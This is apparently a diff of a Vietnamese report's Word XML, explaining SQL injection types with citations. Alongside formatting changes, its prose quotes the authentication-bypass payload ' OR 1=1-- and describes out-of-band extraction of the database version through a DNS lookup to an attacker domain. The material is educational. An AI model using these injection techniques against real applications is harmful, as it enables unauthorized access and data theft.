-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9935,12 +10005,175 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>SQL Injection là một kỹ thuật tấn công cho phép kẻ tấn công lợi dụng những lỗ hổng trong quá trình kiểm tra và lọc dữ liệu đầu vào của các ứng dụng web</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"nckQkNuU","properties":{"formattedCitation":"[13]","plainCitation":"[13]","noteIndex":0},"citationItems":[{"id":148,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/4SWAVXRW"],"itemData":{"id":148,"type":"webpage","title":"SQL Injection","URL":"https://viblo.asia/p/sql-injection-MgNeWWbKeYx","accessed":{"date-parts":[["2025",10,4]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[13]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>. Bằng cách "tiêm" (inject) các câu lệnh SQL bất hợp pháp thông qua các form nhập liệu, kẻ tấn công có thể thực thi các truy vấn không mong muốn trên cơ sở dữ liệu, thậm chí trên cả máy chủ đang chạy ứng dụng đó</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"2q7c6erP","properties":{"formattedCitation":"[14]","plainCitation":"[14]","noteIndex":0},"citationItems":[{"id":151,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/4Y4SUFZT"],"itemData":{"id":151,"type":"webpage","abstract":"Read this practical technical guide about the 5 most common SQL injection attacks and how to prevent them. It packs real-life examples, mitigation steps &amp; more!","container-title":"Pentest-Tools.com","language":"vi","title":"Breaking down the 5 most common SQL injection attacks","URL":"https://pentest-tools.com/blog/sql-injection-attacks","accessed":{"date-parts":[["2025",10,4]]},"issued":{"date-parts":[["2024",4,29]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[14]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0" w:line="288" w:lineRule="auto"/>
+        <w:ind w:left="720" w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tấn công SQL Injection có thể gây ra những hậu quả nghiêm trọng, từ việc đánh cắp thông tin nhạy cảm của người dùng (như tài khoản, mật khẩu, thông tin thẻ tín dụng) cho đến việc xóa, thay đổi hoặc chèn </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -9950,7 +10183,7 @@
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Tấn công SQL Injection có thể gây ra những hậu quả nghiêm trọng, từ việc đánh cắp thông tin nhạy cảm của người dùng (như tài khoản, mật khẩu, thông tin thẻ tín dụng) cho đến việc xóa, thay đổi hoặc chèn dữ liệu</w:t>
+        <w:t>dữ liệu</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10037,9 +10270,10 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
+          <w:noProof/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="561C7BD7" wp14:editId="618FE4DE">
@@ -10287,6 +10521,7 @@
             <w:pPr>
               <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                 <w:b/>
@@ -10436,7 +10671,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Nếu kẻ tấn công nhập giá trị </w:t>
       </w:r>
       <w:r>
@@ -10481,6 +10715,7 @@
             <w:pPr>
               <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                 <w:b/>
@@ -10836,6 +11071,7 @@
             <w:pPr>
               <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                 <w:color w:val="000000"/>
@@ -10970,6 +11206,7 @@
             <w:pPr>
               <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                 <w:b/>
@@ -11488,6 +11725,7 @@
             <w:pPr>
               <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                 <w:b/>
@@ -11667,6 +11905,7 @@
             <w:pPr>
               <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                 <w:b/>
@@ -11956,7 +12195,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Dạ</w:t>
       </w:r>
       <w:r>
@@ -12014,6 +12252,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Đây là loại tấn công phổ biến nhất, trong đó kẻ tấn công sử dụng cùng một kênh giao tiếp để thực hiện tấn công và nhận kết quả truy vấn. Kết quả của truy vấn độc hại được hiển thị trực tiếp trong phản hồi HTTP của ứng dụng web.</w:t>
       </w:r>
     </w:p>
@@ -12194,6 +12433,7 @@
             <w:pPr>
               <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                 <w:b/>
@@ -12507,6 +12747,7 @@
             <w:pPr>
               <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                 <w:b/>
@@ -12750,6 +12991,7 @@
             <w:pPr>
               <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                 <w:b/>
@@ -12914,6 +13156,7 @@
         <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         <w:spacing w:line="285" w:lineRule="atLeast"/>
         <w:ind w:left="720" w:firstLine="720"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -12972,6 +13215,7 @@
             <w:pPr>
               <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                 <w:b/>
@@ -13172,18 +13416,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve">ẻ tấn công lợi dụng lỗi SQL để vượt qua trang xác thực. Thay vì nhập tên đăng nhập và mật khẩu hợp lệ, chúng sử dụng các chuỗi </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>như ' OR 1=1-- để biến đổi câu truy vấn, khiến điều kiện xác thực luôn đúng và cho phép truy cập trái phép.</w:t>
+        <w:t>ẻ tấn công lợi dụng lỗi SQL để vượt qua trang xác thực. Thay vì nhập tên đăng nhập và mật khẩu hợp lệ, chúng sử dụng các chuỗi như ' OR 1=1-- để biến đổi câu truy vấn, khiến điều kiện xác thực luôn đúng và cho phép truy cập trái phép.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13200,6 +13433,28 @@
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>) Kỹ thuật Dựa trên Lỗi (Error-based SQL Injection)</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13208,57 +13463,21 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>b</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>) Kỹ thuật Dựa trên Lỗi (Error-based SQL Injection)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0" w:line="288" w:lineRule="auto"/>
-        <w:ind w:left="1080" w:firstLine="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Kẻ tấn công cố ý chèn mã SQL độc hại để gây ra lỗi cơ sở dữ liệu. Thông báo lỗi này thường tiết lộ thông tin nhạy cảm về cấu trúc cơ sở dữ liệu (tên bảng, phiên bả</w:t>
       </w:r>
       <w:r>
@@ -13389,6 +13608,7 @@
             <w:pPr>
               <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                 <w:b/>
@@ -14073,6 +14293,7 @@
             <w:pPr>
               <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                 <w:b/>
@@ -14318,7 +14539,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Trích xuất tên bả</w:t>
       </w:r>
       <w:r>
@@ -14351,6 +14571,7 @@
             <w:pPr>
               <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                 <w:b/>
@@ -14567,6 +14788,7 @@
             <w:pPr>
               <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                 <w:b/>
@@ -14589,6 +14811,7 @@
                 <w:lang w:eastAsia="ja-JP"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>1'</w:t>
             </w:r>
             <w:r>
@@ -14824,18 +15047,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>ng 2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: Tấn </w:t>
+        <w:t xml:space="preserve">ng 2: Tấn </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15072,6 +15284,7 @@
             <w:pPr>
               <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                 <w:b/>
@@ -15334,6 +15547,7 @@
             <w:pPr>
               <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                 <w:b/>
@@ -15623,7 +15837,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Kẻ tấn công gửi một truy vấn chứa một hàm buộc máy chủ tạm dừng (SLEEP() hoặc tương đương) nếu một điều kiện cụ thể là đúng. Thời gian phản hồi của máy chủ sẽ cho biết kết quả của điều kiện.</w:t>
       </w:r>
       <w:r>
@@ -15681,6 +15894,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Ví dụ Khai thác (Kiểm tra lỗ hổ</w:t>
       </w:r>
       <w:r>
@@ -15737,6 +15951,7 @@
             <w:pPr>
               <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                 <w:b/>
@@ -15957,6 +16172,7 @@
             <w:pPr>
               <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                 <w:b/>
@@ -16290,18 +16506,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>ng 3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
+        <w:t xml:space="preserve">ng 3: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16449,6 +16654,7 @@
             <w:pPr>
               <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                 <w:b/>
@@ -16629,18 +16835,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve">Truy vấn này buộc cơ sở dữ liệu thực hiện một yêu cầu chia sẻ tệp (hoặc DNS lookup) có chứa phiên bản cơ sở dữ liệu (version()) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>được nhúng vào tên miền mà kẻ tấn công đang lắng nghe (.hacker.com). Kẻ tấn công sau đó đọc tệp nhật ký của máy chủ tên miền để trích xuất dữ liệu.</w:t>
+        <w:t>Truy vấn này buộc cơ sở dữ liệu thực hiện một yêu cầu chia sẻ tệp (hoặc DNS lookup) có chứa phiên bản cơ sở dữ liệu (version()) được nhúng vào tên miền mà kẻ tấn công đang lắng nghe (.hacker.com). Kẻ tấn công sau đó đọc tệp nhật ký của máy chủ tên miền để trích xuất dữ liệu.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16677,18 +16872,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>ng 4</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
+        <w:t xml:space="preserve">ng 4: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16723,6 +16907,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Kẻ tấn công sử dụng ký tự phân cách câu lệnh (thường là dấu chấm phẩy ;) để thêm một hoặc nhiều câu lệnh SQL hoàn toàn mới vào truy vấn gốc.</w:t>
       </w:r>
       <w:r>
@@ -16843,6 +17028,7 @@
             <w:pPr>
               <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                 <w:color w:val="000000"/>
@@ -16997,6 +17183,7 @@
